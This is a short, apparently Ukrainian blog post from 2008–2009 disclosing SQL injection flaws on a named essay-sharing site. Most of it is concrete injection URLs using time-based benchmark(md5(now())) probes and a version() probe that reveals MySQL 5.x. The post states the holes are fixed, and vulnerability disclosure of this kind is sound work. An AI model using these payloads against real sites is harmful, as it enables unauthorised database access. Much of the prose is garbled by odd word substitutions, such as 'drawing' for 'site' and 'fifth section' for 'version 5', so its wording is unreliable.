У березні, 31.03.2008, я знайшов SQL DB Structure Extraction та SQL Injection уразливості на чертежі http://uareferat.com. Конечно, про що найближчим часом сповіщу адміністрацію плану.
Детальна інформація про уразливості з’прилично явиться пізніше.
SQL DB Structure Extraction:
SQL Injection:
http://uareferat.com/rus/details/’+benchmark(10000,md5(now()))+’/
http://uareferat.com/rus/referaty/1?+version()-’1/
Вивело п’ятий розділ веб-сайта, означать MySQL 5.x.
http://uareferat.com/rus/referaty/1?+benchmark(10000,md5(now()))-’1/
http://uareferat.com/rus/’+benchmark(10000,md5(now()))+’/
Дані уразливості вже виправлені.
This entry was posted on 19:13 09.12.2009 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.
Оставить комментарий
Вы должны быть зарегистрироавны чтобы оставить комментарий.